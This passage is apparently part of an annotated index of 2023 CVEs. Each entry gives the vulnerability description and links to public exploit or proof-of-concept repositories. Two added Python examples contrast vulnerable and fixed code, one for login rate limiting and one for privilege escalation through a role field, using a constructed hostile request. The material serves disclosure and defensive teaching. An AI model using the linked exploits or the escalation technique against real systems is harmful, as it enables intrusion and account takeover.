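    attacker = [attempt_login(t, users, "alice", f"guess{i}", "198.51.100.7") for i in range(5)]
    # The real user on another source is unaffected by the attacker's failures.
    victim = attempt_login(t, users, "alice", "correct horse", "203.0.113.9")
    # Spraying many usernames from one source exhausts that source's own budget.
    spray = [attempt_login(t, users, f"user{i}", "x", "198.51.100.7") for i in range(6)]
    now[0] += 61                          # window elapses, budgets refill
    after = attempt_login(t, users, "alice", "guess-late", "198.51.100.7")
    return {"attacker": attacker, "victim": victim, "spray": spray, "after": after}


if __name__ == "__main__":
    print(demo())
```

In production the counters live in shared storage (the window must survive a restart and span all instances), and "source" needs care behind proxies: trusting `X-Forwarded-For` from arbitrary clients lets an attacker mint a fresh source per request.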

### CVE-2023-1671 (2023-04-04)

A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.

- [ohnonoyesyes/CVE-2023-1671](https://github.com/ohnonoyesyes/CVE-2023-1671)
- [W01fh4cker/CVE-2023-1671-POC](https://github.com/W01fh4cker/CVE-2023-1671-POC)
- [csffs/cve-2023-1671](https://github.com/csffs/cve-2023-1671)

### CVE-2023-1698 (2023-05-15)

In multiple products of WAGO a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behaviour, Denial of Service and full system compromise.

- [Chocapikk/CVE-2023-1698](https://github.com/Chocapikk/CVE-2023-1698)
- [deIndra/CVE-2023-1698](https://github.com/deIndra/CVE-2023-1698)
- [thedarknessdied/WAGO-CVE-2023-1698](https://github.com/thedarknessdied/WAGO-CVE-2023-1698)

### CVE-2023-1718 (2023-11-01)

Improper file stream access in /desktop_app/file.ajax.php?action=uploadfile in Bitrix24 22.0.300 allows unauthenticated remote attackers to cause denial-of-service via a crafted "tmp_url".

- [jhonnybonny/Bitrix24DoS](https://github.com/jhonnybonny/Bitrix24DoS)

### CVE-2023-1767 (2023-04-20)

The Snyk Advisor website (https://snyk.io/advisor/) was vulnerable to a stored XSS prior to 28th March 2023. A feature of Snyk Advisor is to display the contents of a scanned package's Readme on its package health page. An attacker could create a package in NPM with an associated markdown README file containing XSS-able HTML tags. Upon Snyk Advisor importing the package, the XSS would run each time an end user browsed to the package's page on Snyk Advisor.

- [weizman/CVE-2023-1767](https://github.com/weizman/CVE-2023-1767)

### CVE-2023-1773 (2023-03-31)

A vulnerability classified as critical was found in Rockoa 2.3.2. This affects unknown code of the file webmainConfig.php of the component Configuration File Handler. Manipulation with unknown data leads to a code injection vulnerability. The attack can be launched remotely. The exploit is publicly available.

- [CTF-Archives/xinhu-v2.3.2](https://github.com/CTF-Archives/xinhu-v2.3.2)

### CVE-2023-1829 (2023-04-12)

A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function does not properly deactivate filters in the case of perfect hashes while deleting the underlying structure, which can later lead to double freeing the structure. A local attacker can use this vulnerability to elevate their privileges to root.

We recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.

- [lanleft/CVE-2023-1829](https://github.com/lanleft/CVE-2023-1829)

### CVE-2023-1874 (2023-04-12)

The WP Data Access plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.3.7. This is due to a lack of authorization checks on the multiple_roles_update function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wpda_role[]' parameter during a profile update. This requires the 'Enable role management' setting to be enabled for the site.

- [thomas-osgood/cve-2023-1874](https://github.com/thomas-osgood/cve-2023-1874)
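
The WP Data Access entry above and the i-Educar entry earlier in this section (CVE-2024-45058, `nivel_usuario_` in a POST to `educar_usuario_cad.php`) are the same bug: a profile-update handler copies submitted fields into the user record without deciding, from the server-side record, who may touch the role field. The block below is an added example, not code from either project, with the unguarded handler beside a fixed one; users, roles and form data are constructed for the demo.

```python
"""Added example (not i-Educar or WP Data Access code) for the privilege
escalation pattern shared by CVE-2024-45058 (nivel_usuario_) and
CVE-2023-1874 (wpda_role[]): a profile handler that copies request fields
into the user record without checking who may change the role field.
Users, roles and form data are constructed for the demo."""
from copy import deepcopy

ROLE_RANK = {"subscriber": 1, "teacher": 2, "administrator": 9}

# Constructed user table: id -> record
USERS = {
    1: {"name": "root", "email": "root@example.test", "role": "administrator"},
    7: {"name": "mallory", "email": "m@example.test", "role": "subscriber"},
}

PROFILE_FIELDS = {"name", "email"}
PRIVILEGED_FIELDS = {"role"}


def update_profile_vulnerable(users: dict, actor_id: int, target_id: int, form: dict) -> dict:
    """Every submitted key lands in the record; the role check is simply absent."""
    users[target_id].update(form)
    return users[target_id]


def update_profile_fixed(users: dict, actor_id: int, target_id: int, form: dict) -> dict:
    """Allow-list ordinary fields; gate privileged ones on the actor's stored role."""
    unknown = set(form) - PROFILE_FIELDS - PRIVILEGED_FIELDS
    if unknown:
        raise ValueError(f"unexpected fields: {sorted(unknown)}")
    actor_rank = ROLE_RANK[users[actor_id]["role"]]
    if actor_id != target_id and actor_rank < ROLE_RANK["administrator"]:
        raise PermissionError("only administrators may edit other accounts")
    if PRIVILEGED_FIELDS & form.keys():
        new_rank = ROLE_RANK.get(form["role"])
        if new_rank is None:
            raise ValueError("unknown role")
        # The current server-side role decides, never the submitted one,
        # and nobody may grant a rank above their own.
        if actor_rank < ROLE_RANK["administrator"] or new_rank > actor_rank:
            raise PermissionError("not allowed to change role")
    users[target_id].update(form)
    return users[target_id]


def demo() -> dict:
    attack = {"name": "mallory", "role": "administrator"}  # constructed hostile POST body
    vuln = deepcopy(USERS)
    escalated_role = update_profile_vulnerable(vuln, 7, 7, attack)["role"]
    fixed = deepcopy(USERS)
    try:
        update_profile_fixed(fixed, 7, 7, attack)
        blocked = False
    except PermissionError:
        blocked = True
    update_profile_fixed(fixed, 7, 7, {"email": "new@example.test"})  # ordinary self-edit still works
    update_profile_fixed(fixed, 1, 7, {"role": "teacher"})            # an administrator may promote
    return {
        "vulnerable_role": escalated_role,
        "blocked": blocked,
        "fixed_role": fixed[7]["role"],
        "fixed_email": fixed[7]["email"],
    }


if __name__ == "__main__":
    print(demo())
```

The allow-list on field names is what closes the door on parameters nobody thought of; the rank comparison is what stops an administrator-lite role from handing out a rank above its own.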

### CVE-2023-2002 (2023-05-26)

A vulnerability was found in the HCI sockets implementation due to a missing capability check in net/bluetooth/hci_sock.c in the Linux Kernel. This flaw allows an attacker unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication.

- [lrh2000/CVE-2023-2002](https://github.com/lrh2000/CVE-2023-2002)

### CVE-2023-2008 (2023-04-14)

A flaw was found in the Linux kernel's udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.

- [bluefrostsecurity/CVE-2023-2008](https://github.com/bluefrostsecurity/CVE-2023-2008)

### CVE-2023-2023 (2023-05-30)

The Custom 404 Pro WordPress plugin before 3.7.3 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.

- [thatformat/Hvv2023](https://github.com/thatformat/Hvv2023)
- [druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation](https://github.com/druxter-x/PHP-CVE-2023-2023-2640-POC-Escalation)

### CVE-2023-2024 (2023-05-18)

Improper authentication in OpenBlue Enterprise Manager Data Collector versions prior to 3.2.5.75 allows access to an unauthorized user under certain circumstances.

- [team890/CVE-2023-2024](https://github.com/team890/CVE-2023-2024)

### CVE-2023-2033 (2023-04-14)

Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

- [insoxin/CVE-2023-2033](https://github.com/insoxin/CVE-2023-2033)
- [sandumjacob/CVE-2023-2033-Analysis](https://github.com/sandumjacob/CVE-2023-2033-Analysis)
- [gretchenfrage/CVE-2023-2033-analysis](https://github.com/gretchenfrage/CVE-2023-2033-analysis)
- [mistymntncop/CVE-2023-2033](https://github.com/mistymntncop/CVE-2023-2033)
- [tianstcht/CVE-2023-2033](https://github.com/tianstcht/CVE-2023-2033)

### CVE-2023-2114 (2023-05-08)

The NEX-Forms WordPress plugin before 8.4 does not properly escape the `table` parameter, which is populated with user input, before concatenating it to an SQL query.

- [SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114](https://github.com/SchmidAlex/nex-forms_SQL-Injection-CVE-2023-2114)

### CVE-2023-2123 (2023-08-16)

The WP Inventory Manager WordPress plugin before 2.1.0.13 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.

- [0xn4d/poc-cve-xss-encoded-wp-inventory-manager-plugin](https://github.com/0xn4d/poc-cve-xss-encoded-wp-inventory-manager-plugin)

### CVE-2023-2215 (2023-04-21)

A critical vulnerability was discovered in Campcodes Coffee Shop POS System 1.0. It affects an unknown function of the file /admin/user/manage_user.php. Manipulating the argument id with unknown data can exploit an SQL injection vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [zwxxb/CVE-2023-2215](https://github.com/zwxxb/CVE-2023-2215)

### CVE-2023-2249 (2023-06-09)

The wpForo Forum plugin for WordPress is vulnerable to Local File Include, Server-Side Request Forgery, and PHAR Deserialization in versions up to, and including, 2.1.7. This is due to the insecure use of file_get_contents without appropriate verification of the data being supplied to the function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to retrieve the contents of files like wp-config.php hosted on the system, perform a deserialization attack and possibly achieve remote code execution, and make requests to internal services.

- [ixiacom/CVE-2023-2249](https://github.com/ixiacom/CVE-2023-2249)

### CVE-2023-2255 (2023-05-25)

Improper access control in editor components of The Document Foundation LibreOffice allowed an attacker to craft a document that would cause external links to be loaded without prompt. In the affected versions of LibreOffice documents that used "floating frames" linked to external files, would load the contents of those frames without prompting the user for permission to do so. This was inconsistent with the treatment of other linked content in LibreOffice. This issue affects: The Document Foundation LibreOffice 7.4 versions prior to 7.4.7; 7.5 versions prior to 7.5.3.

- [elweth-sec/CVE-2023-2255](https://github.com/elweth-sec/CVE-2023-2255)
- [SaintMichae64/CVE-2023-2255](https://github.com/SaintMichae64/CVE-2023-2255)

### CVE-2023-2375 (2023-04-28)

A critical vulnerability was found in Ubiquiti EdgeRouter X up to 2.0.9-hotfix.6. It concerns an unspecified function of the component Web Management Interface. Manipulating the argument src with unknown data can exploit a command injection vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [0x0jr/HTB-Devvortex-CVE-2023-2375-PoC](https://github.com/0x0jr/HTB-Devvortex-CVE-2023-2375-PoC)

### CVE-2023-2437 (2023-11-22)

The UserPro plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.1.1. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email. An attacker can leverage CVE-2023-2448 and CVE-2023-2446 to get the user's email address to successfully exploit this vulnerability.

- [RxRCoder/CVE-2023-2437](https://github.com/RxRCoder/CVE-2023-2437)

### CVE-2023-2516 (2023-05-05)

Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.7.

- [mnqazi/CVE-2023-2516](https://github.com/mnqazi/CVE-2023-2516)

### CVE-2023-2523 (2023-05-04)

A critical vulnerability was identified in Weaver E-Office 9.5. It concerns an unspecified function of the file App/Ajax/ajax.php?action=mobile_upload_save. Manipulating the argument upload_quwan with unknown data can exploit an unrestricted upload vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [bingtangbanli/cve-2023-2523-and-cve-2023-2648](https://github.com/bingtangbanli/cve-2023-2523-and-cve-2023-2648)
- [Any3ite/CVE-2023-2523](https://github.com/Any3ite/CVE-2023-2523)

### CVE-2023-2579 (2023-07-17)

The InventoryPress WordPress plugin through 1.7 does not sanitise and escape some of its settings, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.

- [0xn4d/poc-cve-xss-inventory-press-plugin](https://github.com/0xn4d/poc-cve-xss-inventory-press-plugin)

### CVE-2023-2591 (2023-05-09)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitHub repository nilsteampassnet/teampass prior to 3.0.7.

- [mnqazi/CVE-2023-2591](https://github.com/mnqazi/CVE-2023-2591)

### CVE-2023-2594 (2023-05-09)

A vulnerability was found in SourceCodester Food Ordering Management System 1.0. It has been rated as critical. Affected is an unknown code block of the component Registration. Manipulating the argument username with unknown data can exploit an SQL injection vulnerability. The attack can be launched over the network.

- [thehackingverse/CVE-2023-2594](https://github.com/thehackingverse/CVE-2023-2594)

### CVE-2023-2598 (2023-06-01)

A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation.

- [ysanatomic/io_uring_LPE-CVE-2023-2598](https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598)
- [cainiao159357/CVE-2023-2598](https://github.com/cainiao159357/CVE-2023-2598)

### CVE-2023-2636 (2023-07-17)

The AN_GradeBook WordPress plugin through 5.0.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

- [lukinneberg/CVE-2023-2636](https://github.com/lukinneberg/CVE-2023-2636)

### CVE-2023-2640 (2023-07-26)

On Ubuntu kernels carrying both c914c0e27eb0 and "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs", an unprivileged user may set privileged extended attributes on the mounted files, leading them to be set on the upper files without the appropriate security checks.

- [OllaPapito/gameoverlay](https://github.com/OllaPapito/gameoverlay)
- [luanoliveira350/GameOverlayFS](https://github.com/luanoliveira350/GameOverlayFS)
- [g1vi/CVE-2023-2640-CVE-2023-32629](https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629)
- [musorblyat/CVE-2023-2640-CVE-2023-32629](https://github.com/musorblyat/CVE-2023-2640-CVE-2023-32629)
- [SanjayRagavendar/Ubuntu-GameOver-Lay](https://github.com/SanjayRagavendar/Ubuntu-GameOver-Lay)
- [Nkipohcs/CVE-2023-2640-CVE-2023-32629](https://github.com/Nkipohcs/CVE-2023-2640-CVE-2023-32629)
- [K5LK/CVE-2023-2640-32629](https://github.com/K5LK/CVE-2023-2640-32629)

### CVE-2023-2650 (2023-05-30)

Issue summary: Processing some specially crafted ASN.1 object identifiers or data containing them may be very slow.

Impact summary: Applications that use OBJ_obj2txt() directly, or use any of the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message size limit may experience notable to very long delays when processing those messages, which may lead to a Denial of Service.

An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - most of which have no size limit. OBJ_obj2txt() may be used to translate an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL type ASN1_OBJECT) to its canonical numeric text form, which are the sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by periods.

When one of the sub-identifiers in the OBJECT IDENTIFIER is very large (these are sizes that are seen as absurdly large, taking up tens or hundreds of KiBs), the translation to a decimal number in text may take a very long time. The time complexity is O(n^2) with 'n' being the size of the sub-identifiers in bytes (*).

With OpenSSL 3.0, support to fetch cryptographic algorithms using names / identifiers in string form was introduced. This includes using OBJECT IDENTIFIERs in canonical numeric text form as identifiers for fetching algorithms.

Such OBJECT IDENTIFIERs may be received through the ASN.1 structure AlgorithmIdentifier, which is commonly used in multiple protocols to specify what cryptographic algorithm should be used to sign or verify, encrypt or decrypt, or digest passed data.

Applications that call OBJ_obj2txt() directly with untrusted data are affected, with any version of OpenSSL. If the use is for the mere purpose of display, the severity is considered low.

In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 certificates, including simple things like verifying its signature.

The impact on TLS is relatively low, because all versions of OpenSSL have a 100KiB limit on the peer's certificate chain. Additionally, this only impacts clients, or servers that have explicitly enabled client authentication.

In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, such as X.509 certificates. This is assumed to not happen in such a way that it would cause a Denial of Service, so these versions are considered not affected by this issue in such a way that it would be cause for concern, and the severity is therefore considered low.

- [hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650](https://github.com/hshivhare67/OpenSSL_1.1.1g_CVE-2023-2650)

### CVE-2023-2728 (2023-07-03)

Users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using ephemeral containers. The policy ensures pods running with a service account may only reference secrets specified in the service account's secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the `kubernetes.io/enforce-mountable-secrets` annotation are used together with ephemeral containers.

- [Cgv-Dev/Metasploit-Module-TFM](https://github.com/Cgv-Dev/Metasploit-Module-TFM)

### CVE-2023-2732 (2023-05-25)

The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

- [RandomRobbieBF/CVE-2023-2732](https://github.com/RandomRobbieBF/CVE-2023-2732)
- [Jenderal92/WP-CVE-2023-2732](https://github.com/Jenderal92/WP-CVE-2023-2732)
- [ThatNotEasy/CVE-2023-2732](https://github.com/ThatNotEasy/CVE-2023-2732)

### CVE-2023-2744 (2023-06-27)

The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp/v1/accounting/v1/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

- [pashayogi/CVE-2023-2744](https://github.com/pashayogi/CVE-2023-2744)

### CVE-2023-2822 (2023-05-20)

A problematic vulnerability was identified in Ellucian Ethos Identity up to 5.10.5. Affected is an unknown code block of the file /cas/logout. Manipulating the argument url with unknown data can exploit a cross-site scripting vulnerability. The attack can be launched over the network. The exploit is publicly available. Upgrading to version 5.10.6 fixes this issue. Applying the upgrade is the recommended remediation.

- [cberman/CVE-2023-2822-demo](https://github.com/cberman/CVE-2023-2822-demo)

### CVE-2023-2825 (2023-05-26)

An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups.

- [Occamsec/CVE-2023-2825](https://github.com/Occamsec/CVE-2023-2825)
- [yuimarudev/CVE-2023-2825](https://github.com/yuimarudev/CVE-2023-2825)
- [Tornad0007/CVE-2023-2825-Gitlab](https://github.com/Tornad0007/CVE-2023-2825-Gitlab)
- [Rubikcuv5/CVE-2023-2825](https://github.com/Rubikcuv5/CVE-2023-2825)
- [caopengyan/CVE-2023-2825](https://github.com/caopengyan/CVE-2023-2825)
- [cc3305/CVE-2023-2825](https://github.com/cc3305/CVE-2023-2825)

### CVE-2023-2833 (2023-06-06)

The ReviewX plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.6.13 due to insufficient restriction on the 'rx_set_screen_options' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_screen_options[option]' and 'wp_screen_options[value]' parameters during a screen option update.

- [Alucard0x1/CVE-2023-2833](https://github.com/Alucard0x1/CVE-2023-2833)

### CVE-2023-2859 (2023-05-24)

Code Injection in GitHub repository nilsteampassnet/teampass prior to 3.0.9.

- [mnqazi/CVE-2023-2859](https://github.com/mnqazi/CVE-2023-2859)

### CVE-2023-2868 (2023-05-24)

A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product affecting versions 5.1.3.001-9.2.0.006. The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar files (tape archives). The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of the BNSF-36456 patch. This patch was automatically applied to all customer appliances.

- [cfielding-r7/poc-cve-2023-2868](https://github.com/cfielding-r7/poc-cve-2023-2868)
- [cashapp323232/CVE-2023-2868CVE-2023-2868](https://github.com/cashapp323232/CVE-2023-2868CVE-2023-2868)
- [krmxd/CVE-2023-2868](https://github.com/krmxd/CVE-2023-2868)

### CVE-2023-2877 (2023-06-27)

The Formidable Forms WordPress plugin before 6.3.1 does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.

- [RandomRobbieBF/CVE-2023-2877](https://github.com/RandomRobbieBF/CVE-2023-2877)

### CVE-2023-2916 (2023-08-15)

The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.

- [d0rb/CVE-2023-2916](https://github.com/d0rb/CVE-2023-2916)

### CVE-2023-2928 (2023-05-27)

A critical vulnerability was identified in DedeCMS up to 5.7.106. It concerns an unspecified function of the file uploads/dede/article_allowurl_edit.php. Manipulating the argument allurls with unknown data can exploit a code injection vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [CN016/DedeCMS-getshell-CVE-2023-2928-](https://github.com/CN016/DedeCMS-getshell-CVE-2023-2928-)

### CVE-2023-2951 (2023-05-28)

A critical vulnerability was discovered in code-projects Bus Dispatch and Information System 1.0. It concerns an unspecified function of the file delete_bus.php. Manipulating the argument busid with unknown data can exploit an SQL injection vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [Spr1te76/CVE-2023-2951](https://github.com/Spr1te76/CVE-2023-2951)

### CVE-2023-2982 (2023-06-29)

The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.

- [RandomRobbieBF/CVE-2023-2982](https://github.com/RandomRobbieBF/CVE-2023-2982)
- [H4K6/CVE-2023-2982-POC](https://github.com/H4K6/CVE-2023-2982-POC)
- [LoaiEsam37/CVE-2023-2982](https://github.com/LoaiEsam37/CVE-2023-2982)
- [wshinkle/CVE-2023-2982](https://github.com/wshinkle/CVE-2023-2982)

### CVE-2023-2986 (2023-06-08)

The Abandoned Cart Lite for WooCommerce plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 5.14.2. This is due to insufficient encryption on the user being supplied during the abandoned cart link decode through the plugin. This allows unauthenticated attackers to log in as users who have abandoned the cart, who are typically customers. Further security hardening was introduced in version 5.15.1 that ensures sites are no longer vulnerable through historical check-out links, and additional hardening was introduced in version 5.15.2 that ensured null key values wouldn't permit the authentication bypass.

- [Ayantaker/CVE-2023-2986](https://github.com/Ayantaker/CVE-2023-2986)
- [Alucard0x1/CVE-2023-2986](https://github.com/Alucard0x1/CVE-2023-2986)

### CVE-2023-3009 (2023-05-31)

Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.9.

- [mnqazi/CVE-2023-3009](https://github.com/mnqazi/CVE-2023-3009)

### CVE-2023-3047 (2023-06-13)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TMT Lockcell allows SQL Injection. This issue affects Lockcell: before 15.

- [Phamchie/CVE-2023-3047](https://github.com/Phamchie/CVE-2023-3047)
- [Kimsovannareth/Phamchie](https://github.com/Kimsovannareth/Phamchie)

### CVE-2023-3076 (2023-07-10)

The MStore API WordPress plugin before 3.9.9 does not prevent visitors from creating user accounts with the role of their choice via their wholesale REST API endpoint. This is only exploitable if the site owner paid to access the plugin's pro features.

- [im-hanzou/MSAPer](https://github.com/im-hanzou/MSAPer)

### CVE-2023-3079 (2023-06-05)

Type confusion in V8 in Google Chrome prior to 114.0.5735.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

- [mistymntncop/CVE-2023-3079](https://github.com/mistymntncop/CVE-2023-3079)

### CVE-2023-3124 (2023-06-07)

The Elementor Pro plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the update_page_option function in versions up to, and including, 3.11.6. This makes it possible for authenticated attackers with subscriber-level capabilities to update arbitrary site options, which can lead to privilege escalation.

- [AmirWhiteHat/CVE-2023-3124](https://github.com/AmirWhiteHat/CVE-2023-3124)

### CVE-2023-3163 (2023-06-08)

A problematic vulnerability was identified in y_project RuoYi up to 4.7.7. It affects the function filterKeyword. Manipulating the argument value with unknown data can exploit a resource consumption vulnerability.

- [George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention](https://github.com/George0Papasotiriou/CVE-2023-3163-SQL-Injection-Prevention)

### CVE-2023-3244 (2023-08-17)

The Comments Like Dislike plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the restore_settings function called via an AJAX action in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to reset the plugin's settings. NOTE: After attempting to contact the developer with no response, and reporting this to the WordPress plugin's team 30 days ago we are disclosing this issue as it still is not updated.

- [drnull03/POC-CVE-2023-3244](https://github.com/drnull03/POC-CVE-2023-3244)

### CVE-2023-3269 (2023-07-11)

A vulnerability exists in the memory management subsystem of the Linux kernel. The lock handling for accessing and updating virtual memory areas (VMAs) is incorrect, leading to use-after-free problems. This issue can be successfully exploited to execute arbitrary kernel code, escalate containers, and gain root privileges.

- [lrh2000/StackRot](https://github.com/lrh2000/StackRot)

### CVE-2023-3338 (2023-06-30)

A null pointer dereference flaw was found in the Linux kernel's DECnet networking protocol. This issue could allow a remote user to crash the system.

- [TurtleARM/CVE-2023-3338-DECPwn](https://github.com/TurtleARM/CVE-2023-3338-DECPwn)

### CVE-2023-3390 (2023-06-28)

A use-after-free vulnerability was found in the Linux kernel's netfilter subsystem in net/netfilter/nf_tables_api.c.

Mishandled error handling with NFT_MSG_NEWRULE makes it possible to use a dangling pointer in the same transaction causing a use-after-free vulnerability. This flaw allows a local attacker with user access to cause a privilege escalation issue.

We recommend upgrading past commit 1240eb93f0616b21c675416516ff3d74798fdc97.

- [flygonty/CVE-2023-3390_PoC](https://github.com/flygonty/CVE-2023-3390_PoC)

### CVE-2023-3450 (2023-06-28)

A critical vulnerability was found in Ruijie RG-BCR860 2.5.13. It affects an unknown part of the component Network Diagnostic Page. Manipulation with unknown data can exploit an OS command injection vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [yuanjinyuyuyu/CVE-2023-3450](https://github.com/yuanjinyuyuyu/CVE-2023-3450)
- [caopengyan/CVE-2023-3450](https://github.com/caopengyan/CVE-2023-3450)

### CVE-2023-3452 (2023-08-12)

The Canto plugin for WordPress is vulnerable to Remote File Inclusion in versions up to, and including, 3.0.4 via the 'wp_abspath' parameter. This allows unauthenticated attackers to include and execute arbitrary remote code on the server, provided that allow_url_include is enabled. Local File Inclusion is also possible, albeit less useful because it requires that the attacker be able to upload a malicious php file via FTP or some other means into a directory readable by the web server.

- [leoanggal1/CVE-2023-3452-PoC](https://github.com/leoanggal1/CVE-2023-3452-PoC)

### CVE-2023-3460 (2023-07-04)

The Ultimate Member WordPress plugin before 2.6.7 does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild.

- [gbrsh/CVE-2023-3460](https://github.com/gbrsh/CVE-2023-3460)
- [rizqimaulanaa/CVE-2023-3460](https://github.com/rizqimaulanaa/CVE-2023-3460)
- [yon3zu/Mass-CVE-2023-3460](https://github.com/yon3zu/Mass-CVE-2023-3460)
- [EmadYaY/CVE-2023-3460](https://github.com/EmadYaY/CVE-2023-3460)
- [diego-tella/CVE-2023-3460](https://github.com/diego-tella/CVE-2023-3460)
- [Rajneeshkarya/CVE-2023-3460](https://github.com/Rajneeshkarya/CVE-2023-3460)
- [DiMarcoSK/CVE-2023-3460_POC](https://github.com/DiMarcoSK/CVE-2023-3460_POC)
- [julienbrs/exploit-CVE-2023-3460](https://github.com/julienbrs/exploit-CVE-2023-3460)

### CVE-2023-3519 (2023-07-19)

Unauthenticated remote code execution

- [telekom-security/cve-2023-3519-citrix-scanner](https://github.com/telekom-security/cve-2023-3519-citrix-scanner)
- [securekomodo/citrixInspector](https://github.com/securekomodo/citrixInspector)
- [mr-r3b00t/CVE-2023-3519](https://github.com/mr-r3b00t/CVE-2023-3519)
- [d0rb/CVE-2023-3519](https://github.com/d0rb/CVE-2023-3519)
- [BishopFox/CVE-2023-3519](https://github.com/BishopFox/CVE-2023-3519)
- [SalehLardhi/CVE-2023-3519](https://github.com/SalehLardhi/CVE-2023-3519)
- [KR0N-SECURITY/CVE-2023-3519](https://github.com/KR0N-SECURITY/CVE-2023-3519)
- [passwa11/CVE-2023-3519](https://github.com/passwa11/CVE-2023-3519)
- [rwincey/cve-2023-3519](https://github.com/rwincey/cve-2023-3519)
- [mandiant/citrix-ioc-scanner-cve-2023-3519](https://github.com/mandiant/citrix-ioc-scanner-cve-2023-3519)
- [Chocapikk/CVE-2023-3519](https://github.com/Chocapikk/CVE-2023-3519)
- [JonaNeidhart/CVE-2023-3519-BackdoorCheck](https://github.com/JonaNeidhart/CVE-2023-3519-BackdoorCheck)
- [Mohammaddvd/CVE-2023-3519](https://github.com/Mohammaddvd/CVE-2023-3519)

### CVE-2023-3640 (2023-07-24)

